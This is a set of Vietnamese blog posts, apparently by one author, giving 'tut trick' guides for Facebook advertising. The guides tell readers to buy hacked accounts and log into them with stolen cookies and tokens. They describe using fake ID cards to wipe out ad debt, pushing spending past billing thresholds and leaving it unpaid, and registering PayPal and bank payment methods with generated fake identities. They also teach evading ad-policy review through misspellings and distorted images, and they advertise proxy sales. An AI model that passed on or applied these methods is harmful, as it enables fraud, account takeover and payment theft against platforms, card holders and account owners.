  Sử dụng dạng via nào để lên camp thì có tỷ lệ sống cao luôn là một tranh cãi trong giới quảng cáo, thậm chí nó đã trở thành một chiêu bài để các via thủ đem ra bán via giá cao.

  Nhưng thực tế thì có đúng là một số dạng via đã kháng 273 hay 902 có trâu bò thần thánh như quảng cáo?
  Câu trả lời là KHÔNG

  Các bạn đừng bao giờ tin vào câu chuyện Via kháng về dạng lọ dạng chai thì trâu hơn, khoẻ hơn, đơn giản là một thanh niên có tiền án tiền sự không bao giờ có thể được ưu ái hơn một người bình thường.

  Việc lên camp và bất thường có thể diễn ra lập lại liên tục thậm chí via + tài khoản ra đi vĩnh viễn dù các bạn có sử dụng loại Via đã kháng gì đi nữa. Cái chúng ta có thể làm là lựa chọn loại via nào có sẵn ở thị trường lúc đó để có giá thành tốt nhất và ít bị các yếu tố hạn chế nhất ví dụ: tránh via EU có thuế

  Yếu tố thứ hai khi lựa chọn via là các bạn cần check activity log & Security and Login để xác định rõ nguồn via đã sử dụng vào các việc spam, share link, hay làm các việc khác trước khi bán cho các bạn chưa.

  Việc này dường như rất đơn giản nhưng hầu như các bạn mua via không để ý, một em via đã login ip lung tung và đi spam thì hầu như khônng thể sử dụng vào quảng cáo hoặc sẽ mất công + thời gian để làm sạch lại activity cho Via, điều này là không cần thiết. Nên lựa chọn các loại via đã XMDT để có thể sử dụng lâu dài.

  Cuối cùng, hãy luôn nhớ rằng khi các bạn mua via và sử dụng trên một IP khác với location thường xuyên hoạt động của via trước đây thì hãy thao tác từ từ. Login để tạo cookie ít nhất 24h trước khi làm các thao tác liên quan đến quảng cáo.

  Tài khoản quảng cáo?

  Việc mua tài khoản quảng cáo đồng tiền gì, đất nước nào?, múi giờ nào ? không ảnh hưởng gì đến bất thường của tài khoản quảng cáo. Nó chỉ ảnh hưởng đến kết quảng cáo cáo do chênh lệch múi giờ, hoặc phí thanh toán sẽ bị đội lên do khác tiền tệ.

  Khi check được nguồn mua via tốt, các bạn có thể lựa chọn các loại tài khoản quảng cáo miễn nó có ngưỡng thanh toán cao và múi giờ hay tiền tệ phù hợp với công việc của bạn.

  Chú ý rằng một via không nên cầm quá nhiều tài khoản quảng cáo ( tốt nhất là 2 – 3 tài khoản ads / 1 via lên camp ), trong một khoảng thời gian ngắn thì các bạn chưa thấy vấn đề. Nhưng khi Facebook bước vào các đợt càn quét tài khoản thì nhiều tài khoản có chung quản trị viên luôn là mục tiêu hàng đầu của Bot Facebook

  Sử dụng Facebook Business ?

  Hiện tại thì chạy BM một thời gian Facebook đều bắt xác minh doanh nghiệp, điều đó cũng không có gì lạ vì những hệ thống spam BM ở Việt Nam nở rộ trong 2 năm trở lại đây.

  Tuy nhiên kể cả bm đã xác minh nhưng nếu các bạn chưa biết sử dụng đúng cách thì tài khoản vẫn ra đi bình thường. Chưởng môn có vài chú ý cho bạn khi sử dụng Business

  Với những BM mới được sử dụng, dùng tài khoản trong Business một cách lần lượt, tránh lên camp ồ ạt các tài khoản trong BM vào cùng một page.

  Để tài sản ( pixel, page ) ở một BM riêng biệt share đối tác cho các BM khác chuyên lên camp để bảo vệ tài sản tốt nhất.

  Môi trường lên camp sạch

  Thời gian vừa qua có hàng tạ thanh niên làm “tool bọc via” lên camp xanh chuyên bốc phét, đủ các loại lý thuyết về thông số máy tính, địa chỉ MAC… các kiểu công nghệ lôi ra để loè, quảng cáo lên cả vpcs sống 100%. Kết quả sử dụng hàng loạt xong… chết như thường, người làm tool lên camp cũng chết =))

  Đọc thêm: https://longhn.com/thay-doi-mac-address-id-o-cung-user-agent-finger-print-ip-ngoai-cau-hinh-may-la-tai-khoan-se-xanh-khong-chet-dan-6364.html

  Để tạo ra một môi trường lên camp sạch thực ra cũng không khó như nhiều người nghĩ, nếu nhu cầu chỉ để sử dụng số lượng không nhiều và ổn định thì chúng ta có thể tự tạo môi trường sạch ngay trên máy tính của các bạn.

  Phương pháp tạo môi trường lên camp 1:

  Sử dụng các User trên windows của các bạn

  Vào Control Panel của windows > Tạo nhiều user trên windows > Mỗi user các bạn login rồi install 1 loại trình duyệt khác nhau: coccoc, chrome, firefox, opera, vivaldi, brave, safari …v…v.. > mỗi một trình duyệt bạn login 1 via cố định

  Bằng cách tạo ra nhiều user trên windows và cài đặt các trình duyệt khác nhau + sử dụng 4g để tránh login cùng IP các bạn đã dễ dàng & miễn phí tạo ra môi trường riêng biệt cho từng Via.

  Tất nhiên hạn chế của phương pháp này là sẽ làm chúng ta quản lý dàn tài khoản khá mất công khi chuyển đi chuyển lại giữa các user, nhưng nếu chỉ vài tài khoản thì không vấn đề.

  Phương pháp tạo môi trường lên camp 2:

  Tạo máy ảo Vmware

  Đây có lẽ là giải pháp mà nhiều anh em ads thủ đang sử dụng nhất, nó cũng miễn phí để tạo ra một môi trường sạch cho việc sử dụng VIA.

  Tuy nhiên thực tế thì chưởng môn đánh giá giải pháp này không cao vì Bot dễ dàng nhận ra môi trường ảo và khi quét bay dàn login trên vmware, ngoài ra nó quá tốn dung lượng ổ cứng cũng như làm chậm máy tính. Nghĩ làm dàn 10 con via lên camp mà setup + mỗi lần quản lý tắt bật 10 cái máy ảo cũng hết hơi.

  Nhưng nếu các bạn vẫn muốn thử các này cũng không phải không có cách, hãy sử dụng các trình duyệt ẩn danh khi kết hợp với Vmare

  Phương pháp tạo môi trường lên camp 3:

  Mua nhiều VPS để sử dụng via lên camp

  So với 2 phương pháp ở trên thì đây có lẽ là phương pháp phức tạp nhất và cũng tốn chi phí. Một vps ngoại để chạy được windows và dùng lên camp mượt cũng khoảng 30 – 40 $, mỗi vps sử dụng 1 via thì một dàn tài khoản 10 – 20 cũng ngốn của các bạn kha khá chi phí / tháng. Chưởng môn không khuyến khích các bạn sử dụng phương pháp này.

  Phương pháp tạo môi trường lên camp 4:

  Sử dụng các phương pháp bên trên với các loại trình duyệt ẩn danh

  Có 3 ứng cử viên trình duyệt tập trung vào bảo mật & ẩn danh người dùng.

  EPIC
  https://epicbrowser.com/thank_you.php

  SRWare Iron
  https://www.srware.net/downloads/srware_iron64.exe

  và Brave
  https://laptop-updates.brave.com/latest/winx64

  Các loại thẻ visa, master lên camp dễ nhất

  Thẻ ảo lên camp

  Ở thời điểm hiện tại thì các nguồn thẻ ảo đã bị fix gần hết, chỉ còn thẻ ảo của MBbank, Octo by cimb, Barter, fyatu, bankera là có thể thêm phương thức thanh toán.

  Tuy nhiên chưởng môn nghĩ các bạn nên sử dụng thẻ ảo thông qua bước sử dụng paypal làm trung gian phương thức thanh toán. Hoặc các bạn nên add thẻ ảo vào phương thức thanh toán của BM trước khi sử dụng lên camp.

  Các loại thẻ visa và master cứng định danh

  Thẻ của các ngân hàng ACB, seabank, hdbank, abbank, scbbank đang là các nguồn thẻ cứng sử dụng ổn định và tốt nhất hiện nay.

  Nội dung quảng cáo có vi phạm chính sách?

  Quảng cáo bị từ chối hoặc đang chạy bị báo vi phạm cũng là một nguyên nhân hàng đầu gây ra đỏ tài khoản quảng cáo. Hãy kiểm tra lại tab quảng cáo của bạn để biết nguyên nhân cụ thể gây ra từ chối mẫu quảng cáo. Hoặc rà soát lại nội dung xem có vi phạm các lỗi cơ bản bên dưới không.

  Hình ảnh & video vi phạm

  Hình ảnh trước sau

  Hình ảnh khiêu dâm, gợi cảm

  Hình ảnh liên quan đến thương hiệu

  Hình ảnh chụp màn hình

  Nội dung text vi phạm

  Đề cập đến đặc điểm cá nhân

  Nội dung phân biệt đối xử

  Cơ hội nhà ở, việc làm, tài chính

  Thương hiệu, bản quyền

  Câu kéo tương tác

  Từ ngữ khiêu dâm, tục tĩu, bạo lực

  Cố tính lách vi phạm chính sách

  Câu từ giật gân, gây sốc, câu view

  Tăng giảm cân – Thực phẩm bổ sung

  Tham khảo thêm: https://longhn.com/tut-lach-vpcs-moi-nhat-2019-by-chapallthay-2547.html

  Tham khảo thêm: https://www.facebook.com/policies/ads/

  Các hành động lên camp bất thường khác

  Lên cùng lúc nhiều chiến dịch hoặc nhân vài chục nhóm.

  Lên camp chuyển đổi trên tài khoản mới

  Nội dung bài quảng cáo và landing không liên quan đến nhau

  Sử dụng via lên camp trên nhiều IP ở nhiều địa điểm khác nhau

  Tóm lại việc xây dựng một dàn tài khoản quảng cáo Facebook không phải chỉ dựa vào một loại tool nào đó có thể giúp các bạn cứ thế mà lên camp sống 100%, nó là một quy trình và tool sẽ chỉ giúp bạn được rút gọn một bước nào đó. Hiểu được tư duy này thì tự các bạn có thể tìm cách cho việc lên camp tài khoản sao cho phù hợp với công việc của mình.

 • Tại sao hiện tại ở Việt Nam lên camp bản nháp cũng die tài khoản ads?

  Chào các bạn, năm 2020 khủng khiếp đã qua đi nhưng dư âm của nó vẫn còn vang vọng đến bây giờ và cả nhiều năm sau này. Đặc biệt đáng nhớ đời với mấy bạn làm ngành quảng cáo Facebook. Hệ thống quản lý người dùng và tài khoản quảng cáo của Facebook là một hệ thống có yếu tố phức tạp hàng đầu thế giới.

  Ngay chưởng môn cũng chịu không biết chính xác nó căn cứ vào cái gì để quyết định một tài khoản đâu là Green đâu là Red. Trong phạm vi kiến thức của chưởng môn, hôm nay tôi sẽ chia sẻ cho mọi người 4 lý do chính khiến giai đoạn này trở thành giai đoạn nhậy cảm với ngành quảng cáo online tại Việt Nam.

  1/ Giai đoạn bầu cử Mỹ kéo dài từ 9-12/2020

  Để tránh bài học từ 2016 trước đó, Facebook đã bật chế độ siết chặt các rule liên quan đến nội dung đồng thời yêu cầu tất cả các Tk ads bao gồm cũ + mới phải đồng ý quy tắc mới cho chạy quảng cáo.

  https://thanhnien.vn/cong-nghe/facebook-siet-quang-cao-chinh-tri-trong-bau-cu-tong-thong-my-1289039.html

  Động thái này đã đồ sát một lượng lớn tài khoản + Bm không chỉ riêng ở thị trường Việt Nam mà trên toàn thế giới, đặc biệt với các tài khoản chạy chuyển đổi out traffic. Điều này ảnh hưởng thế nào đến người dùng ” chân chính “? Chúng ta biết mỗi thiết bị Facebook chỉ cho phép khởi tạo 2 profile, tình trạng hoạt động bất thường của 1 profile xảy ra trên thiết bị bất kỳ đều dẫn đến việc bị log và về sau bạn chỉ có thể ngồi xem người khác chạy ads ? Tất nhiên nếu bạn đi học MFA rồi thì lại khác ?

  2/ Thuật toán tracking real profile thay đổi.

  Trong môi trường phone chưởng môn sẽ không nói nữa vì chúng ta đều thấy Facebook có thể làm gì với cái điện thoại của chúng ta. Còn trên môi trường máy tính, trong giai đoạn vừa rồi có mấy thanh niên thầy bà lẳng ảo tưởng lùa gà đi rao vặt là Facebook thông qua trình duyệt web có thể đọc được MAC máy, MAC modem, Serinumber ổ cứng… vân vân và mây mây kết lại là thầy bán tool làm sạch môi trường cho các em =)))

  Chưởng môn khẳng định với các bạn là 100% bốc phét, bọn nó chẳng hiểu cái éo gì về sân chơi này cả. Từ lúc đi dạy Facebook 3 đời đến bây giờ chưởng môn chưa biết change Mac hay seri ổ cứng nó là như thế nào. Các bạn hiểu đơn giản là chỉ có các phần mềm được Administrator cấp quyền install trên máy tính mới có thể tự động đọc cụ thể thông số máy tính của các bạn.

  Còn đối với mấy thằng wesite trừ khi người dùng cấp quyền không thì quên đi. Vậy thì Facebook đọc được cái gì trên máy tính của chúng ta? ? Bật mí chút để các thầy đỡ gà, trước đây tất cả các hệ thống quảng cáo online đều dựa vào cookie và history + bookmark của trình duyệt, bây giờ nâng cấp thêm tí rồi. Còn lại đóng 47tr700 vào www.chapallthay.com để chưởng môn giải thích băm kỹ cho các bạn hiểu.

  3/ Thẻ ảo tạo hàng loạt + cc chùa pay nợ dẫn đến fix đầu thẻ ( bin ) nhanh chóng.

  Trong nửa sau của năm 2020, có một đợt tuồn hàng chưa từng có với ít nhất 4 triệu – 6 triệu thẻ tín dụng ăn cắp được bán ra bởi các trùm xò trong ngành black. Trên các forum nước ngoài như blackhatworld hay xxx.ru họ đồn thổi với nhau rằng có lẽ các nhóm hacker hàng đầu thế giới sợ chết vì covid nên phải sống gấp, bán hết inventory đi lấy tiền chơi cốc, bem gái cho nó thực tế…

  Mấy hacker việt nòi giống lạc hồng nổi tiếng ăn cỗ đi đầu thì thả sức mua về bem từ google ads cho đến Facebook ads, từ checkout cho đến checkin nói chung bem được gì cứ bem cật lực. Tiền của ai chẳng là tiền, của mình vẫn là tốt hơn cả. Facebook nó sợ quá nên giảm số lượng thêm phương thức thanh toán của mỗi thẻ từ 10 xuống 2 và sắp tới là 1. Đồng thời chặn cả loạt bin với hình thức verify code ?

  4/ Xproxy và các công nghệ biến 3g4g thành local sock làm nát dải IP 4g toàn tập của Việt Nam.

  Tội nặng nhất là đội này, nên chưởng môn kể sau cùng. Tsb chúng nó chứ để kiếm tí tiền từ việc tăng mắt livestream, spam group, tăng like tăng follow mà bọn nó đương tâm cắm hàng mấy chục nghìn usb 4g trên máy tính để reset lấy ip liên tục nhằm spam tạo + nuôi profile Facebook.

  Đây là hành vi mà hệ thống Facebook ghét nhất, nó thà cho các bạn chạy nợ, chạy chùa còn hơn để các bạn tạo profile ảo spam hệ thống của nó. Phá vỡ nền tảng social sẽ làm người dùng rời bỏ, đây là việc nó kỵ nhất. Điều gì đến cũng đến, kho IP với các nhà mạng ở VN vốn đã mong manh ( cả đất nước chúng ta đang dùng internet thuê ) nay bị các cháu spam đã bị cho vào blacklist hết…

  Các bạn hình dung việc một buổi sáng cắm 4g để lên camp mà ăn vào quả ip đã die mấy chục profile Facebook do spam group thì có bản nháp nào sống được không?

  Tóm lại năm 2021 chưởng môn chủ trương đi ra nước ngoài sống và làm việc, không ở cái nơi phố thị ồn ào khoa trương phét lác này nữa. Ai theo tôi thì vào mua vé, chỉ 110k đồng giá / 1 slot đi Mỹ, EU, HAWAII, BALI, Mallorca..v…v… Tùy chọn tại đây: https://longhn.com/mua-socks5

  Kéo xuống dưới có hướng dẫn sử dụng, quản lý tài khoản ổn định trên 1 IP cá nhân riêng biệt, không dính blacklist lên camp xanh lè, tốc độ cao không hạn chế.

 • Cẩm nang tut trick facebook toàn tập phần 3: Refund, xóa nợ, Kích nợ, ân hạn, vượt ngưỡng, paypal, bank, thẻ bất tử ?

  Nhiều bạn bỏ ra vài triệu, thậm chí hàng chục triệu để mua tut trick facebook. Trong khi những tut này mình và một số ae đã share free ra cộng đồng từ lâu. Hôm nay mình tổng hợp lại tất cả cho các bạn nhé

  Refund + xóa nợ: 

  Điều kiện bill phát sinh < 180 ngày. Gán tk ads sang 1 profile cũ, có lịch sử hoạt động quảng cáo đầy đủ. Dùng link bên dưới, điền như hình. Riêng số tham chiếu các bạn tìm trong phần lập hóa đơn.

  https://www.facebook.com/help/contact/649167531904667

  Lầy lội hơn các bạn có thể vào mục chat với support để nhây: https://www.facebook.com/business/form/chat?hc_location=ufi

  Kích nợ ( dành cho tk có ngưỡng nợ cao):

  Lấy 1 clone cũ, kết bạn, đổi info+tên, treo avarta giống hệt profile cần kích nợ. Rip giả mạo để vào checkpoint, up ảnh linh tinh cho nó chuyển sang FAQ.

  Chuẩn bị sẵn cmnd fake, bật tab ẩn danh, fake ip sang mỹ, úc, hàn, lần lượt gửi ảnh cầm cmnd hoặc cmnd fake của profile để kháng về. Sử dụng 2 link bên dưới

  https://m.facebook.com/help/contact/183000765122339

  Và link

  https://m.facebook.com/help/contact/237843336274237

  Sau khi tài khoản mở FAQ, số dư nợ quảng cáo sẽ reset ?

  Ân hạn:

  Khi có số lượng lớn tài khoản, để tài khoản có tỷ lệ ân hạn cao, các bạn chặn ngưỡng nợ. Và thả ngưỡng cho tài khoản báo nợ vào chiều tối ngày thứ 7, chế độ thanh toán sẽ pending và 1 số tk sẽ tiếp tục đc ân hạn x6 lần ngưỡng hiện tại.

  Vượt ngưỡng:

  Để tài khoản tiêu vượt ngưỡng, bạn set ngân sách nhóm qc thành 999999 $ Hoặc 2 tỷ với vnđ, sau đó x10 nhóm. Done tôi đã từng tiêu 1 tk ngưỡng 25$ mà vít lên 1400$ theo cách này. Chú ý dễ die tk đấy

  Add Paypal:

  Chuẩn bị: 1 thẻ visa có sẵn 30k, clone via us

  Vào trình ẩn danh, Fake ip us, tạo bm, tạo tk ads, vào pttt thêm paypal, reg theo thông tin lấy từ link bên dưới:

  https://www.getnewidentity.com/fake-identity.php

  Addbank:

  Chuẩn bị: via châu âu

  Vào trình ẩn danh, fake ip pháp, uk, đức, newziland, tạo bm, tạo tk ads, vào pttt thêm bank, reg theo thông tin lấy từ link bên dưới:

  https://fake-it.to

  Tut thẻ bất tử:

  chính là tut add paypal?, khi đã add xong paypal vào fb thì lại đá thẻ trong paypal ra, vào tạo paypal mới rùi lại add thẻ đấy vào, cứ như thế cho đến khi paypal ko cho add thẻ nữa thì thôi. Như thế thì sẽ rất tiết kiệm thẻ ?

 • Cẩm nang tut trick facebook toàn tập – Phần 2

  Chào các bạn, dạo này mải coin với card nên hôm nay mới viết tiếp phần 2 của cẩm nang tut trick facebook được. Trong phần này tôi sẽ nói sâu về business facebook, các bạn sẽ hiểu rõ hơn quyền lực của business (BM) và tôi chỉ sử dụng BM mà không phải tài khoản cá nhân. Để hiểu rõ phần này, bạn nên đọc phần 1 và trang bị cho mình các kiến thức cơ bản

  I – Thủ thuật tut trick facebook Business

  Các định nghĩa cơ bản cần nắm vững:

  Thêm Đối Tác cho BM: Là hành động bạn chỉ định ( gán ) 1 đối tác thông qua ID của BM ( xem trong phần Thông tin doanh nghiệp )

  Chỉ định tài sản: Facebook coi tk ads, page, pixel ..v…v… trong BM là 1 dạng tài sàn. Sau khi đã gán đối tác, bạn cần chỉ định ít nhất 1 tài sản bất kỳ cho đối tác để cùng quản lý.

  Thêm người: 1 BM đã được gán đối tác + chỉ định tài sản, bạn còn cần thêm người để có thể chỉnh sửa, quản lý 1 tài sản cụ thể.

  1, Tạo kho tài khoản dùng dần bất tử với BM

  Như các bạn đã biết thì dạo gần đây hệ thống quản lý user automation của facebook hoạt động dựa trên nền tảng AI đã cực thông minh và nhạy bén. Vì vậy việc profle của bạn hôm nay tạo, vài tiếng sau bị checkpoint là rất bình thường. Tài khoản ads nằm trong profile cá nhân thì càng thê thảm, mất nick thì coi như mất tk ads luôn, gán hàng loạt sang 1 tk cầm thì bị liên đới chết 1 dàn. Vì vậy câu hỏi làm sao để tạo ra một kho tài khoản an toàn và có thể sử dụng lâu dài luôn là câu hỏi hàng đầu của dân làm quảng cáo. Và đã đến lúc BM thể hiện sức mạnh của nó như tôi đã nói ở phần 1, sau khi lên camp và có tk ads sống, các bạn cần thực hiện 2 bước sau:

  Bước 1. Tạo link fb.me: 

  Trong BM bạn chọn phần Thành Viên —> Thêm Người và làm theo hướng dẫn

  Bạn lưu lại toàn bộ link fb.me chứa quyền sở hữu BM nằm trong các profile mà bạn có, bây giờ nếu mỗi ngày các bạn làm ra hàng trăm tài khoản ads thì có thể lưu hàng trăm link fb.me ra 1 file text để đảm bảo an toàn và dùng dần. chú ý rằng 1 link fb.me chỉ tồn tại 30 ngày và có giá trị sử dụng 1 lần duy nhất.

  Bước 2. Đưa tài khoản cá nhân đã sống vào BM: 

  Trong đường link quản lý tài khoản quảng cáo cá nhân, bạn copy ID của tài khoản quảng cáo facebook.com/ads/manager/accounts —> Vào BM chọn mục Tài Khoản Quảng Cáo —> Yêu cầu quyền truy cập …. —> làm theo hình bên dưới

  Ok, done sau khi bạn đã đưa tài khoản quảng cáo cá nhân vào BM mà profile bị checkpoint thì bạn có thể login vào 1 profile trắng. Trên thanh địa chỉ dán link fb.me/xxxx mà đã lưu ở trên để có thể tiếp tục sử dụng tài khoản ads bình thường, nhớ sau khi dùng link fb.me thì lại tạo thêm link để thay vào link đã sử dụng cho an toàn các bạn nhé. 

  2, Quản lý hàng vạn tài khoản dễ dàng và không nhầm lẫn

  Khi quản lý hàng trăm thậm chí hàng vạn tài khoản ads, chưa kể các profile checkpoint và nhiều nhân viên cùng sử dụng link fb.me chồng tréo lên nhau. Việc nhầm lẫn và rối loạn là chắc chắn sẽ xảy ra.

  Vậy chúng ta sẽ quản lý kho tài khoản như thế nào để phân biệt các tài khoản ads nào đã sử dụng, tk ads nào do ai quản lý ? Dễ nhất là các bạn sử dụng ngay tên của BM hãy đặt tên BM theo mẫu sau: Tên Máy – Tên Kho – Tên TK – NV làm

  Ví dụ tôi có 1 tài khoản số 38 nằm trong kho 3 của máy 7 do nhân viên Toàn làm ra. Tôi sẽ đặt tên BM như sau: M07_K03_38_Toan

  Đồng thời, tôi đưa 1 IDBM quản lý cho các nhân viên, yêu cầu nv làm xong con nào thì gán đối tác sang IDBM của tôi, lúc này thì dưới tài khoản ads sẽ có dòng ( tk ads 1 thuộc sở hữu của M07_K03_38_Toan )

  Với các này thì các bạn có thể quản lý hoặc ra lệnh cho các nhân viên của mình thao tác chính xác tài khoản mà các bạn muốn, bất chấp profile có check point hay không.

  3, Chạy nhiều tài khoản ads vào 1 page mà không bị die page hoặc báo nợ vào page.

  Khi tài khoản ads báo nợ, đầu tiên hệ thống của facebook sẽ báo nợ trên chính tài khoản ads —-> báo nợ trên profile có quyền nằm trong khu vực quản trị của tk ads —-> cuối cùng là báo nợ vào page ( khi các bạn để quá nhiều tk ads báo nợ vào page thì sẽ dẫn đến tình trạng page chết lâm sàng cứ lên tk ads mới vào là die hoặc chết hẳn hủy đăng trang bắt kháng nghị, mà thường là không về )

  Mấu chốt của việc die page, hoặc page bị báo nợ vào page khi chạy số lượng lớn tài khoản ads vào page là thời điểm khi tk ads bị báo nợ các bạn để page nằm trong cùng 1 môi trường làm việc với tk ads: cùng profile hold, cùng trong 1 BM.

  Giải pháp: Đưa 2 BM vào 1 profile để sử dụng, 1 BM sở hữu page, 1 BM sở hữu tài khoản ads. Lên camp xong thì vào Thông Tin Doanh Nghiệp tự thoát ra khỏi BM sở hữu page. Nhớ lấy link fb.me ra để còn gán sang profile khác nhé =)) dễ vc

  II – Các lỗi thường gặp khi làm quảng cáo trên Facebook

  1, Nội dung vi phạm và giải pháp:

  Nhiều lúc các bạn lên camp tài khoản mới chết không rõ nguyên nhân, hoặc cắn tiền rồi chạy vài ngày xong hẹo. thì cần phải nghĩ ngay đến nội dung vi phạm.

  Các keyword kinh điển cần phải tránh trong bài viết: Sức khỏe, Cam kết, sexy, bikini, sinh lý, làm đẹp, tên riêng, sim sô, sim, hàng hiệu, các brand lớn, công cụ hỗ trợ, súng ống, ma túy, người lớn, miêu tả quá nhiều công dụng khác nhau cho 1 sản phẩm, các loại link rút gọn, ..v…v..

  Giải pháp: Viết sai chính tả, thay bằng các ký tự đặc biệt, đảo ký tự VD: [email protected] K3t, Nâng Ng|_|c, Nâng Mul ..v…v…

  Hình ảnh thì đặc biệt tránh: Cận cảnh 1 bộ phận ví dụ mắt mũi miệng, trước sau, quá nhiều text, hở mông, hở vú, ảnh có logo trade mark, các ảnh đã chạy nợ quá nhiều, các ảnh download trên mạng…

  Giải pháp: Bóp méo hình ảnh, thay bằng các nội dung hoạt hình chế, quay video 15s, 30s, 1p, tạo hiệu ứng ảnh lung linh .v…v…

  Gặp nội dung vi phạm thì tốt nhất đừng cố vì bạn đã vào tầm ngắm, tạo page mới, làm mới bài, lấy ảnh khác xong mới lên camp tk mới tiếp.

  2, Không tạo pixel cho page & website ngay từ đầu

  Hệ sinh thái khách hàng & khách hàng tiềm năng đã truy cập page + website sẽ là vũ khí cực kì lợi hại khi các bạn có dịp nào đó cần push sale. Tạo 1 pixel chỉ mất 5p, và rất dễ dàng vì vậy đừng lười. Các bạn có thể google để biết cách tạo và sử dụng pixel nhé, thường 1 tệp pixel khoảng 200 nghìn khách hàng là các bạn có thể sử dụng để làm remarketing. Đừng sử dụng 1 tệp quá bé, nó sẽ làm giá quảng cáo của các bạn đắt khủng khiếp.

  3, Gán quá nhiều quản trị viên cho tài khoản ads

  Thực ra gán nhiều thì cũng không sao, vấn đề là bạn phải biết chắc rằng các quản trị viên trong page có liên đới đến tk ads nào bất thường không ? Có đang trong 1 page khác bị vi phạm không ? profile cá nhân có đăng các nội dung bị báo cáo vi phạm không ?…v…v… Vì nhiều khi nv của các bạn làm gì đấy mà các bạn không thể kiểm soát được, tốt nhất nên tách profile công việc ra khỏi profile cá nhân. Và biết rõ những action của mình trên page bán hàng để chắc cốp.

  4, Tham nhân nhóm quảng cáo để tối ưu

  Có bạn sau khi đọc bài tối ưu của mình thì chia luồng quảng cáo bằng kỹ thuật nhân nhóm một cách vô tội vạ, với suy nghĩ càng nhiều nhóm thì quảng cáo càng rẻ =)). Như vậy là sai cơ bản, các bạn hình dung việc chia luồng phân phối quảng cáo theo nhóm quá nhiều sẽ dẫn đên việc các bạn bị chồng chéo đối tượng, cạnh tranh giá thầu ngay trong 1 camp. Vì vậy chỉ nên nhân từ 10 – 15 nhóm, sau khi chạy 1 time thì tắt 1/3 – 1/2 nhóm đắt đi, giữ lại 1/2 nhóm có giá thầu tốt nhất để chạy dài là ok.

  Đến đây thì các bạn đã nắm hầu hết những tut trick trong quảng cáo facebook, hãy cố gắng tìm tòi thêm và phát triển những kỹ thuật của riêng mình. Ai có câu hỏi nào khác có thể đặt câu hỏi ngay dưới bài viết, mình sẽ reply khi có thể nhé.

  Chúc các bạn đón năm mới vui vẻ và hạnh phúc bên gia đình, bạn bè

 • Cẩm nang tut trick facebook toàn tập – Phần 1

  Chào các bạn, thế giới tut trick facebook luôn bí ẩn đối với những người mới khám phá. Và nó không hề dễ dàng giống như các bạn nghe các thánh các thầy truyền tai nhau chỉ sau 1 đêm học tut kiếm xyz tiền, x10 x20 tài sản =)) Tôi vẫn hay nói với học viên của mình rằng quảng cáo nếu có chỉ chiếm 10-20% trong thành công của các em.

  Quan trọng nhất vẫn là vận hành, con người hàng hóa ( những thứ không có công thức ). Chỉ có mấy con gà bẩn mới nghĩ rằng bỏ tiền ra mua cái tut thì dễ dàng kiếm lại gấp 10 lần, 100 lần, đời làm gì có chuyện ngon ăn thế ?

  Nếu bạn là beginer, mới tập tọe vào nghề này. Thì tôi nói rằng đã muộn rồi, thị trườn tut trick facebook g đã nát bét. Chúng tôi đã khai thác nó đến mức mà phây búc gần như cấm tất cả đầu thẻ có thể làm số lượng tại việt nam ở thời điểm hiện tại. Và nếu bạn vẫn quyết tâm đọc hết cẩm nang này. Thì xin chào mừng bạn đến với thế giới black chẳng có mầu sắc gì =)) Cơ hội vẫn còn chờ đợi bạn phía trước !

  I- Các kỹ năng cơ bản bắt buộc khi chơi tut trick Facebook

  Fake Ip, Phân loại clone, kỹ thuật login, Business Facebook.

  1- Fake IP:

  Thuật ngữ này tồn tại trong giới UG từ lúc mới có internet, các bạn hiểu đơn giản rằng mỗi máy tính của chúng ta khi kết nối internet sẽ có được cấp cho 1 địa chỉ IP giống địa chỉ nhà. Thay vì sử dụng ip thật, chúng ta mượn nhờ địa chỉ của một người khác ( ở nước khác ví dụ US )  đang kết nối internet để làm những việc mà chúng ta muốn mà ko để lại dấu vết. Trong kỹ năng này, các cái tên mà tôi thường sử dụng: Softether VPN, Tunnello VPN, Zenmate, browsec, hola, Hotspot Shield VPN…. ( hướng dẫn sử dụng bạn có thể search youtube ) Cao cấp hơn bạn có thể sử dụng VPS hoặc kiếm cho mình các SSH để sử dụng

  2- Hiểu rõ, phân loại và sử dụng thành thạo các loại clone ( tài khoản fb) khi sử dụng tut trick facebook, tôi chia thường chia ra làm 4 loại sau:

  + Clone việt trắng: Clone mới chưa có lịch sử hoạt động được tạo ra trên 1ip 1tk ( dùng được) hoặc thi thoảng do các đồng chí cắm tool tạo ẩu thì 1p tạo vài tk (loại này thường nhanh check point, không dùng đc). Thời gian live khoảng 3 đến 5 ngày mua về phải dùng ngay.

  + Clone Việt via change info: Đây là 1 dạng tài khoản bị hack, đã change info và số lượng không nhiều có theo từng đợt tùy trình độ của nhà cung cấp cho các bạn. Thời gian live khá lâu, có thể để từ 7 ngày đến cả tháng, tỷ lệ checkpoint thấp. ( Có mối thì nên dùng loại này )

  + Clone ngoại trắng: Clone mới chưa có lịch sử hoạt động tạo ra bằng cách cắm tool tạo tài khoản sử dụng ssh hoặc proxy nước ngoài số lượng lớn. Loại này cũng dễ check point, thường chỉ live từ 2 – 3 ngày. Mua về cũng phải dùng ngay

  + Clone ngoại via change info: Clone đã có lịch sử hoạt động đã bị hack và change info. Dạng này tương tự dạng số 2, live khá lâu, khó sử dụng hơn vì khi login không có kỹ thuật ở ip việt nam thì dễ dẫn đến bay mầu.

  Tất cả các dạng acc trên, khi bạn mua, nhà cung cấp sẽ cho bạn dạng:  ID|USER|PASS|COOKIE|TOKEN

  3- Kỹ thuật login tài khoản thông qua cookie hoặc token để tránh check point:

  + Login bằng cookie:

  Sử dụng extensions hỗ trợ dạng EDIT THIS COOKIE hoặc thủ công như sau

  Trên trình duyệt chrome hoặc firefox các bạn thực hiện các bước sau:

  Bước 1: Ctrl + Shift + B để hiện thanh dấu trang
  Bước 2: Chuột phải vào thanh dấu trang, thêm trang
  Bước 3: Lưu trên dấu trang là đăng nhập facebook bằng cookie hay gì đó bạn thích
  Bước 4: Copy đoạn javascript bên dưới dán vào phần địa chỉ

  Java_login_logout_fb

  Bước 5: Lưu lại
  Bước 6: tương tự với đoạn javascript xóa cookie để thoát facebook

  Đã xong, bây giờ khi cần login 1 nick, các bạn chỉ việc bấm vào nút dấu trang. Và nó sẽ hiện popup để các bạn copy cookie vào.

  Chú ý: Nghiêm cấm click đăng xuất để thoát acc vì đăng xuất sẽ mất cookie, cookie sẽ không sử dụng được nữa.

